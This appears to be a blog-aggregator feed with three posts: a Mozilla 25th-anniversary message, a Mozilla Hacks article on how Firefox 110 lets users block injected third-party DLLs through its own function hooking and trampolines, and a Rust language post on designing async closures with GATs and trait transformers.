This year, “three thirty-one” is especially meaningful: It’s Mozilla’s 25 year anniversary.

A lot has changed since 1998. Mozilla is no longer just a bold idea. We’re a family of organizations — a nonprofit, a public benefit-corporation, and others — that builds products, fuels movements, and invests in responsible tech.

And we’re no longer a small group of engineers in Netscape’s Mountain View office. We’re technologists, researchers, and activists located around the globe — not to mention tens of thousands of volunteers.

But if a Mozillian from 1998 stepped into a Mozilla office (or joined a Mozilla video call) in 2023, I think they’d quickly feel something recognizable. A familiar spirit, and a familiar set of values.

When Mozilla open-sourced our browser code 25 years ago, the reason was the public interest: We wanted to spark more innovation, more competition, and more choice online. Technology in the public interest has been our manifesto ever since — whether releasing Firefox 1.0 in 2004, or launching Mozilla.ai earlier this year.

Right now, technology in the public interest seems more important than ever before. The internet today is deeply entwined with our personal lives, our professional lives, and society at large. The internet today is also flawed. Centralized control reduces choice and competition. A focus on “engagement” magnifies outrage, and bad actors are thriving.

Right now — and over the next 25 years — Mozilla can do something about this.

Mozilla’s mission and principles are evergreen, and we will continue to evolve to meet the needs and challenges of the modern internet. How people use the internet will change over time, but the need for innovative products that give individuals agency and choice on the internet is a constant. Firefox has evolved from a faithful and efficient render of web pages on PCs to a cross-platform agent that acts on behalf of the individual, protecting them from bad actors and surveillance capitalists as they navigate the web. Mozilla has introduced new products, such as Firefox Relay and Mozilla VPN, to keep people’s identity protected and activity private as they use the internet. Mozilla is contributing to healthy public discourse, with Pocket enabling discovery of amazing content and the mozilla.social Mastodon instance supporting decentralized, community-driven social media.

We’re constantly exploring ways to apply new technologies so that people feel the benefits in their everyday lives, as well as inspire others to responsibly innovate on behalf of humanity. As AI emerges as a core building block for the future of computing, we’ll turn our attention in that direction and ask: How can we make products and technologies like machine learning work in the public interest? We’ve already started this work via Mozilla.ai, a new Mozilla organization focusing on a trustworthy, independent, and open-source AI ecosystem. And via the Responsible AI Challenge, where we’re convening (and funding) bright people and ambitious projects building trustworthy AI.

And we will continue to champion public policy that keeps the internet healthy. There is proposed legislation around the world that seeks to maintain the internet in the public interest: the Platform Accountability and Transparency Act (PATA) in the U.S., the Digital Services Act (DSA) in the EU. Mozilla has helped shape these laws, and we will continue to follow along closely with their implementation and enforcement.

On this “three thirty-one,” I’m realistic about the challenges facing the internet. But I’m also optimistic about Mozilla’s potential to address them. And I’m looking forward to another 25 years of not just product, but also advocacy, philanthropy, and policy in service of a better internet.

Hacks.Mozilla.OrgLetting users block injected third-party DLLs in Firefox

In Firefox 110, users now have the ability to control which third-party DLLs are allowed to load into Firefox processes.

Let’s talk about what this means and when it might be useful.

What is third-party DLL injection?

On Windows, third-party products have a variety of ways to inject their code into other running processes. This is done for a number of reasons; the most common is for antivirus software, but other uses include hardware drivers, screen readers, banking (in some countries) and, unfortunately, malware.

Having a DLL from a third-party product injected into a Firefox process is surprisingly common – according to our telemetry, over 70% of users on Windows have at least one such DLL! (to be clear, this means any DLL not digitally signed by Mozilla or part of the OS).

Most users are unaware when DLLs are injected into Firefox, as most of the time there’s no obvious indication this is happening, other than checking the about:third-party page.

Unfortunately, having DLLs injected into Firefox can lead to performance, security, or stability problems. This is for a number of reasons:

  • DLLs will often hook into internal Firefox functions, which are subject to change from release to release. We make no special effort to maintain the behavior of internal functions (of which there are thousands), so the publisher of the third-party product has to be diligent about testing with new versions of Firefox to avoid stability problems.
  • Firefox, being a web browser, loads and runs code from untrusted and potentially hostile websites. Knowing this, we go to a lot of effort to keep Firefox secure; see, for example, the Site Isolation Security Architecture and Improved Process Isolation. Third-party products may not have the same focus on security.
  • We run an extensive number of tests on Firefox, and third-party products may not test to that extent since they’re probably not designed to work specifically with Firefox.

Indeed, our data shows that just over 2% of all Firefox crash reports on Windows are in third-party code. This is despite the fact that Firefox already blocks a number of specific third-party DLLs that are known to cause a crash (see below for details).

This also undercounts crashes that are caused indirectly by third-party DLLs, since our metrics only look for third-party DLLs directly in the call stack. Additionally, third-party DLLs are a bit more likely to cause crashes at startup, which are much more serious for users.

Firefox has a third-party injection policy, and whenever possible we recommend third parties instead use extensions to integrate into Firefox, as this is officially supported and much more stable.

Why not block all DLL injection by default?

For maximum stability and performance, Firefox could try to block all third-party DLLs from being injected into its processes. However, this would break some useful products like screen readers that users want to be able to use with Firefox. This would also be technically challenging and it would probably be impossible to block every third-party DLL, especially third-party products that run with higher privilege than Firefox.

Since 2010, Mozilla has had the ability to block specific third-party DLLs for all Windows users of Firefox. We do this only as a last resort, after trying to communicate with the vendor to get the underlying issue fixed, and we tailor it as tightly as we can to make Firefox users stop crashing. (We have the ability to only block specific versions of the DLL and only in specific Firefox processes where it’s causing problems). This is a helpful tool, but we only consider using it if a particular third-party DLL is causing lots of crashes such that it shows up on our list of top crashes in Firefox.

Even if we know a third-party DLL can cause a crash in Firefox, there are times when the functionality that the DLL provides is essential to the user, and the user would not want us to block the DLL on their behalf. If the user’s bank or government requires some software to access their accounts or file their taxes, we wouldn’t be doing them any favors by blocking it, even if blocking it would make Firefox more stable.

Giving users the power to block injected DLLs

With Firefox 110, users can block third-party DLLs from being loaded into Firefox. This can be done on the about:third-party page, which already lists all loaded third-party modules. The about:third-party page also shows which third-party DLLs have been involved in previous Firefox crashes; along with the name of the publisher of the DLL, hopefully this will let users make an informed decision about whether or not to block a DLL. Here’s an example of a DLL that recently crashed Firefox; clicking the button with a dash on it will block it:

Screenshot of the about:third-party page showing a module named "CrashingInjectibleDll.dll" with a yellow triangle indicating it has recently caused a crash, and a button with a dash on it that can be used to block it from loading into Firefox.

Here’s what it looks like after blocking the DLL and restarting Firefox:

 Screenshot of the about:third-party page showing a module named "CrashingInjectibleDll.dll" with a yellow triangle indicating it has recently caused a crash, and a red button with an X on it indicating that it is blocked from loading into Firefox.

If blocking a DLL causes a problem, launching Firefox in Troubleshoot Mode will disable all third-party DLL blocking for that run of Firefox, and DLLs can be blocked or unblocked on the about:third-party page as usual.

How it works

Blocking DLLs from loading into a process is tricky business. In order to detect all DLLs loading into a Firefox process, the blocklist has to be set up very early during startup. For this purpose, we have the launcher process, which creates the main browser process in a suspended state. Then it sets up any sandboxing policies, loads the blocklist file from disk, and copies the entries into the browser process before starting that process.

The copying is done in an interesting way: the launcher process creates an OS-backed file mapping object with CreateFileMapping(), and, after populating that with blocklist entries, duplicates the handle and uses WriteProcessMemory() to write that handle value into the browser process. Ironically, WriteProcessMemory() is often used as a way for third-party DLLs to inject themselves into other processes; here we’re using it to set a variable at a known location, since the launcher process and the browser process are run from the same .exe file!

Because everything happens so early during startup, well before the Firefox profile is loaded, the list of blocked DLLs is stored per Windows user instead of per Firefox profile. Specifically, the file is in %AppData%\Mozilla\Firefox, and the filename has the format blocklist-{install hash}, where the install hash is a hash of the location on disk of Firefox. This is an easy way of keeping the blocklist separate for different Firefox installations.

Detecting and blocking DLLs from loading

To detect when a DLL is trying to load, Firefox uses a technique known as function interception or hooking. This modifies an existing function in memory so another function can be called before the existing function begins to execute. This can be useful for many reasons; it allows changing the function’s behavior even if the function wasn’t designed to allow changes. Microsoft Detours is a tool commonly used to intercept functions.

In Firefox’s case, the function we’re interested in is NtMapViewOfSection(), which gets called whenever a DLL loads. The goal is to get notified when this happens so we can check the blocklist and forbid a DLL from loading if it’s on the blocklist.

To do this, Firefox uses a homegrown function interceptor to intercept calls to NtMapViewOfSection() and return that the mapping failed if the DLL is on the blocklist. To do this, the interceptor tries two different techniques:

  • On the 32-bit x86 platform, some functions exported from a DLL will begin with a two-byte instruction that does nothing (mov edi, edi) and have five one-byte unused instructions before that. (either nop or int 3)  For example:
                  nop
                  nop
                  nop
                  nop
                  nop
    DLLFunction:  mov edi, edi
                  (actual function code starts here)
    

    If the interceptor detects that this is the case, it can replace the five bytes of unused instructions with a jmp to the address of the function to call instead. (since we’re on a 32-bit platform, we just need one byte to indicate a jump and four bytes for the address) So, this would look like

                 jmp <address of Firefox patched function>
    DLLFunction: jmp $-5 # encodes in two bytes: EB F9
                 (actual function code starts here)
    

    When the patched function wants to call the unpatched version of DLLFunction(), it simply jumps 2 bytes past the address of DLLFunction() to start the actual function code.

  • Otherwise, things get a bit more complicated. Let’s consider the x64 case. The instructions to jump to our patched function require 13 bytes: 10 bytes for loading the address into a register, and 3 bytes to jump to that register’s location. So the interceptor needs to move at least the first 13 bytes worth of instructions, plus enough to finish the last instruction if needed, to a trampoline function. (it’s known as a trampoline because typically code jumps there, which causes a few instructions to run, and then jumps out to the rest of the target function). Let’s look at a real example. Here’s a simple function that we’re going to intercept, first the C source (Godbolt compiler explorer link):
    int fn(int aX, int aY) {
        if (aX + 1 >= aY) {
            return aX * 3;
        }
        return aY + 5 - aX;
    }
    

    and the assembly, with corresponding raw instructions. Note that this was compiled with -O3, so it’s a little dense:

    fn(int,int):
       lea    eax,[rdi+0x1]   # 8d 47 01
       mov    ecx,esi         # 89 f1
       sub    ecx,edi         # 29 f9
       add    ecx,0x5         # 83 c1 05
       cmp    eax,esi         # 39 f0
       lea    eax,[rdi+rdi*2] # 8d 04 7f
       cmovl  eax,ecx         # 0f 4c c1
       ret                    # c3

    Now, counting 13 bytes from the beginning of fn() puts us in the middle of the lea eax,[rdi+rdi*2] instruction, so we’ll have to copy everything down to that point to the trampoline.

    The end result looks like this:

    fn(int,int) (address 0x100000000):
       # overwritten code
       mov     r11, 0x600000000 # 49 bb 00 00 00 00 06 00 00 00
       jmp     r11              # 41 ff e3
       # leftover bytes from the last instruction
       # so the addresses of everything stays the same
       # We could also fill these with nop’s or int 3’s,
       # since they won’t be executed
       .byte 04
       .byte 7f
       # rest of fn() starts here
       cmovl  eax,ecx         # 0f 4c c1
       ret                    # c3
       
    
    Trampoline (address 0x300000000):
       # First 13 bytes worth of instructions from fn()
       lea    eax,[rdi+0x1]   # 8d 47 01
       mov    ecx,esi         # 89 f1
       sub    ecx,edi         # 29 f9
       add    ecx,0x5         # 83 c1 05
       cmp    eax,esi         # 39 f0
       lea    eax,[rdi+rdi*2] # 8d 04 7f
       # Now jump past first 13 bytes of fn()
       jmp    [RIP+0x0]       # ff 25 00 00 00 00 
                              # implemented as jmp [RIP+0x0], then storing
                              # address to jump to directly after this
                              # instruction
       .qword 0x10000000f
    
    
    Firefox patched function (address 0x600000000):
            <whatever the patched function wants to do>

    If the Firefox patched function wants to call the unpatched fn(), the patcher has stored the address of the trampoline (0x300000000 in this example). In C++ code we encapsulate this in the FuncHook class, and the patched function can just call the trampoline with the same syntax as a normal function call.

    This whole setup is significantly more complicated than the first case; you can see that the patcher for the first case is only around 200 lines long while the patcher that handles this case is more than 1700 lines long! Some additional notes and complications:

    • Not all instructions that get moved to the trampoline can necessarily stay exactly the same. One example is jumping to a relative address that didn’t get moved to the trampoline – since the instruction has moved in memory, the patcher needs to replace this with an absolute jump. The patcher doesn’t handle every kind of x64 instruction (otherwise it would have to be much longer!), but we have automated tests to make sure we can successfully intercept the Windows functions that we know Firefox needs.
    • We specifically use r11 to load the address of the patched function into because according to the x64 calling convention, r11 is a volatile register that is not required to be preserved by the callee.
    • Since we use jmp to get from fn() to the patched function instead of ret, and similarly to get from the trampoline back into the main code of fn(), this keeps the code stack-neutral. So calling other functions and returning from fn() all work correctly with respect to the position of the stack.
    • If there are any jumps from later in fn() into the first 13 bytes, these will now be jumping into the middle of the jump to the patched function and bad things will almost certainly happen. Luckily this is very rare; most functions are doing function prologue operations in their beginning, so this isn’t a problem for the functions that Firefox intercepts.
    • Similarly, in some cases fn() has some data stored in the first 13 bytes that are used by later instructions, and moving this data to the trampoline will result in the later instructions getting the wrong data. We have run into this, and can work around it by using a shorter mov instruction if we can allocate space for a trampoline that’s within the first 2 GB of address space. This results in a 10 byte patch instead of a 13 byte patch, which in many cases is good enough to avoid problems.
    • Some other complications to quickly mention (not an exhaustive list!):
      • Firefox also has a way to do this interception across processes. Fun!
      • Trampolines are tricky for the Control Flow Guard security measure: since they are legitimate indirect call targets that do not exist at compile time, it requires special care to allow Firefox patched functions to call into them.
      • Trampolines also involve some more fixing up for exception handling, as we must provide unwind info for them.

If the DLL is on the blocklist, our patched version of NtMapViewOfSection() will return that the mapping fails, which causes the whole DLL load to fail. This will not work to block every kind of injection, but it does block most of them.

One added complication is that some DLLs will inject themselves by modifying firefox.exe’s Import Address Table, which is a list of external functions that firefox.exe calls into. If one of these functions fails to load, Windows will terminate the Firefox process. So if Firefox detects this sort of injection and wants to block the DLL, we will instead redirect the DLL’s DllMain() to a function that does nothing.

Final words

Principle 4 of the Mozilla Manifesto states that “Individuals’ security and privacy on the internet are fundamental and must not be treated as optional”, and we hope that this will give Firefox users the power to access the internet with more confidence. Instead of having to choose between uninstalling a useful third-party product and having stability problems with Firefox, now users have a third option of leaving the third-party product installed and blocking it from injecting into Firefox!

As this is a new feature, if you have problems with blocking third-party DLLs, please file a bug. If you have issues with a third-party product causing problems in Firefox, please don’t forget to file an issue with the vendor of that product – since you’re the user of that product, any report the vendor gets means more coming from you than it does coming from us!

More information

Special thanks to David Parks and Yannis Juglaret for reading and providing feedback on many drafts of this post and Toshihito Kikuchi for the initial prototype of the dynamic blocklist.

The post Letting users block injected third-party DLLs in Firefox appeared first on Mozilla Hacks - the Web developer blog.

Niko MatsakisThoughts on async closures

I’ve been thinking about async closures and how they could work once we have static async fn in trait. Somewhat surprisingly to me, I found that async closures are a strong example for where async transformers could be an important tool. Let’s dive in! We’re going to start with the problem, then show why modeling async closures as “closures that return futures” would require some deep lifetime magic, and finally circle back to how async transformers can make all this “just work” in a surprisingly natural way.

Sync closures

Closures are omnipresent in combinator style APIs in Rust. For the purposes of this post, let’s dive into a really simple closure function, call_twice_sync:

fn call_twice_sync(mut op: impl FnMut(&str)) {
    op("Hello");
    op("Rustaceans");
}

As the name suggests, call_twice_sync invokes its argument twice. You might call it from synchronous code like so:

let mut buf = String::new();
call_twice_sync(|s| buf.push_str(s));

As you might expect, after this code executes, buf will have the value "HelloRustaceans". (Playground link, if you’re curious to try it out.)

Async closures as closures that return futures

Suppose we want to allow the closure to do async operations, though. That won’t work with call_twice_sync because the closure is a synchronous function:

let mut buf = String::new();
call_twice_sync(|s| s.push_str(receive_message().await));
//                                               ----- ERROR

Given that an async function is just a sync function that returns a future, perhaps we can model an async clousure as a sync closure that returns a future? Let’s try it.

fn call_twice_async<F>(op: impl FnMut(&str) -> F)
where
    F: Future<Output = ()>,
{
    op("Hello").await;
    op("Rustaceans").await;
}

This compiles. So far so good. Now let’s try using it. For now we won’t even use an await, just the same sync code we tried before:

// Hint: won't compile
async fn use_it() {
    let mut buf = String::new();
    call_twice_async(|s| async { buf.push_str(s); });
    //                   ----- Return a future
}

Wait, what’s this? Lo and behold, we get an error, and a kind of intimidating one:

error: captured variable cannot escape `FnMut` closure body
  --> src/lib.rs:13:26
   |
12 |     let mut buf = String::new();
   |         ------- variable defined here
13 |     call_twice_async(|s| async { buf.push_str(s); });
   |                        - ^^^^^^^^---^^^^^^^^^^^^^^^
   |                        | |       |
   |                        | |       variable captured here
   |                        | returns an `async` block that contains a reference to a captured variable, which then escapes the closure body
   |                        inferred to be a `FnMut` closure
   |
   = note: `FnMut` closures only have access to their captured variables while they are executing...
   = note: ...therefore, they cannot allow references to captured variables to escape

So what is this all about? The last two lines actually tell you, but to really see it you have to do a bit of desugaring.

Futures capture the data they will use

The closure tries to construct a future with an async block. This async block is going to capture a reference to all the variables it needs: in this case, s and buf. So the closure will become something like:

|s| MyAsyncBlockType { buf, s }

where MyAsyncBlockType implements Future:

struct MyAsyncBlockType<'b> {
    buf: &'b mut String,
    s: &'b str,
}

impl Future for MyAsyncBlockType<'_> {
    type Output = ();
    
    fn poll(..) { ... }
}

The key point here is that the closure is returning a struct (MyAsyncBlockType) and this struct is holding on to a reference to both buf and s so that it can use them when it is awaited.

Closure signature promises to be finished

The problem is that the FnMut closure signature actually promises something different than what the body does. The signature says that it takes an &str – this means that the closure is allowed to use the string while it executes, but it cannot hold on to a reference to the string and use it later. The same is true for buf, which will be accessible through the implicit self argument of the closure. But when the closure return the future, it is trying to create references to buf and s that outlive the closure itself! This is why the error message says:

= note: `FnMut` closures only have access to their captured variables while they are executing...
= note: ...therefore, they cannot allow references to captured variables to escape

This is a problem!

Add some lifetime arguments?

So maybe we can declare the fact that we hold on to the data? It turns out you almost can, but not quite, and making an async closure be “just” a sync closure that returns a future would require some rather fundamental extensions to Rust’s trait system. There are two variables to consider, buf and s. Let’s begin with the argument s.

An aside: impl Trait capture rules

Before we dive more deeply into the closure case, let’s back up and imagine a top-level function that returns a future:

fn push_buf(buf: &mut String, s: &str) -> impl Future<Output = ()> {
    async move {
        buf.push_str(s);
    }
}

If you try to compile this code, you’ll find that it does not build (playground):

error[E0700]: hidden type for `impl Future<Output = ()>` captures lifetime that does not appear in bounds
 --> src/lib.rs:4:5
  |
3 |   fn push_buf(buf: &mut String, s: &str) -> impl Future<Output = ()> {
  |                    ----------- hidden type `[async block@src/lib.rs:4:5: 6:6]` captures the anonymous lifetime defined here
4 | /     async move {
5 | |         buf.push_str(s);
6 | |     }
  | |_____^
  |
help: to declare that `impl Future<Output = ()>` captures `'_`, you can introduce a named lifetime parameter `'a`
  |
3 | fn push_buf<'a>(buf: &'a mut String, s: &'a str) -> impl Future<Output = ()> + 'a  {
  |            ++++       ++                 ++                                  ++++

impl Trait values can only capture borrowed data if they explicitly name the lifetime. This is why the suggested fix is to use a named lifetime 'a for buf and s and declare that the Future captures it:

fn push_buf<'a>(buf: &'a mut String, s: &'a str) -> impl Future<Output = ()> + 'a 

If you desugar this return position impl trait into an explicit type alias impl trait, you can see the captures more clearly, as they become parameters to the type. The original (no captures) would be:

type PushBuf = impl Future<Output = ()>;
fn push_buf<'a>(buf: &'a mut String, s: &'a str) -> PushBuf

and the fixed version would be:

type PushBuf<'a> = impl Future<Output = ()> + 'a
fn push_buf<'a>(buf: &'a mut String, s: &'a str) -> PushBuf<'a>

From functions to closures

OK, so we just saw how we can define a function that returns an impl Future, how that future will wind up capturing the arguments, and how that is made explicit in the return type by references to a named lifetime 'a. We could do something similar for closures, although Rust’s rather limited support for explicit closure syntax makes it awkward. I’ll use the unimplemented syntax from RFC 3216, you can see the workaround on the playground if that’s your thing:

type PushBuf<'a> = impl Future<Output = ()> + 'a


async fn test() {
    let mut c = for<'a> |buf: &'a mut String, s: &'a str| -> PushBuf<'a> {
        async move { buf.push_str(s) }
    });
    
    let mut buf = String::new();
    c(&mut buf, "foo").await;
}

(Side note that this is an interesting case for the “currently under debate” rules around defining type alias impl trait.)

Now for the HAMMER

OK, so far so grody, but we’ve shown that indeed you could define a closure that returns a future and it seems like things would work. But now comes the problem. Let’s take a look at the call_twice_async function – i.e., instead of looking at where the closure is defined, we look at the function that takes the closure as argument. That’s where things get tricky.

Here is call_twice_async, but with the anonymous lifetime given an explicit name 'a:

fn call_twice_async<F>(op: impl for<'a> FnMut(&str) -> F)
where
    F: Future<Output = ()>,

Now the problem is this: we need to declare that the future which is returned (F) might capture 'a. But F is declared in an outer scope, and it can’t name 'a. In other words, right now, the return type F of the closure op must be the same each time the closure is called, but to get the semantics we want, we need the return type to include a different value for 'a each time.

If Rust had higher-kinded types (HKT), you could do something a bit wild, like this…

fn call_twice_async<F<'_>>(op: impl for<'a> FnMut(&'a str) -> F<'a>)
//                  ----- HKT
where
    for<'a> F<'a>: Future<Output = ()>,

but, of course, we don’t have HKT (and, cool as they are, I don’t think that’s a good fit for Rust right now, it would bust our complexity barrier in my opinion and then some without near enough payoff).

Short of adding HKT or some equivalent, I believe the option workaround is to use a dyn type:

fn call_twice_async(op: impl for<'a> FnMut(&'a str) -> Box<dyn Future<Output = ()> + 'a>)

This works today (and it is, for example, what moro does to resolve exactly this problem). Of course that means that the closure has to allocate a box, instead of just returning an async move. That’s a non-starter.

So we’re kind of stuck. As far as I can tell, modeling async closures as “normal closures that happen to return futures” requires one of two unappealing options

  • extend the language with HKT, or possibly some syntactic sugar that ultimately however desugars to HKT
  • use Box<dyn> everywhere, giving up on zero cost futures, embedded use cases, etc.

More traits, less problems

But wait, there is another way. Instead of modeling async closures using the normal Fn traits, we could define some async closure traits. To keep our life simple, let’s just look at one, for FnMut:

trait AsyncFnMut<A> {
    type Output;
    
    async fn call(&mut self, args: A) -> Self::Output;
}

This is identical to the [sync FnMut] trait, except that call is an async fn. But that’s a pretty important difference. If we desugar the async fn to one using impl Trait, and then to GATs, we can start to see why:

trait AsyncFnMut<A> {
    type Output;
    type Call<'a>: Future<Output = Self::Output> + 'a;
    
    fn call(&mut self, args: A) -> Self::Call<'_>;
}

Notice the Generic Associated Type (GAT) Call. GATs are basically the Rusty way to do HKTs (if you want to go deeper, I wrote a comparison series which may help; back then we called them associated type constructors, not GATs). Essentially what has happened here is that we moved the “HKT” into the trait definition itself, instead of forcing the caller to have it.

Given this definition, when we try to write the “call twice async” function, things work out more smoothly:

async fn call_twice_async<F>(mut op: impl AsyncFnMut(&str)) {
    op.call("Hello").await;
    op.call("World").await;
}

Try it out on the playground, though note that we don’t actually support the () sugar for arbitrary traits, so I wrote impl for<'a> AsyncFnMut<&'a str, Output = ()> instead.

Connection to trait transformers

The translation between the normal FnMut trait and the AsyncFnMut trait was pretty automatic. The only thing we did was change the “call” function to async. So what if we had an async trait transformer, as was discussed earlier? Then we only have one “maybe async” trait, FnMut:

#[maybe(async)]
trait FnMut<A> {
    type Output;
    
    #[maybe(async)]
    fn call(&mut self, args: A) -> Self::Output;
}

Now we can write call_twice either sync or async, as we like, and the code is virtually identical. The only difference is that I write impl FnMut for sync or impl async FnMut for async:

fn call_twice_sync<F>(mut op: impl FnMut(&str)) {
    op.call("Hello");
    op.call("World");
}

async fn call_twice_async<F>(mut op: impl async FnMut(&str)) {
    op.call("Hello").await;
    op.call("World").await;
}

Of course, with a more general maybe-async design, we might just write this function once, but that’s separate concern. Right now I’m only concerned with the idea of authoring traits that can be used in two modes, but not necessarily with writing code that is generic over which mode is being used.

Final note: creating the closure in a maybe-async world

When calling call_twice, we could write |s| buf.push_str(s) or async |s| buf.push_str(s) to indicate which traits it implements, but we could also infer this from context. We already do similar inference to decide the type of s for example. In fact, we could have some blanket impls, so that every F: FnMut also implements F: async FnMut; I guess this is generally true for any trait.

Conclusion

My conclusions:

  • Nothing in this discussion required or even suggested any changes to the underlying design of async fn in trait. Stabilizing the statically dispatched subset of async fn in trait should be forwards compatible with supporting async closures. :tada:
  • The “higher-kinded-ness” of async closures has to go somewhere. In stabilizing GATs, in my view, we’ve committed to the path that it should go into the trait definition (vs HKT, which would push it to the use site). The standard “def vs use site” tradeoffs apply here, I think: def sites often feel simpler and easier to understand, but are less flexible. I think that’s fine.
  • Async trait transformers feel like a great option here that makes async closures work just like you would expect.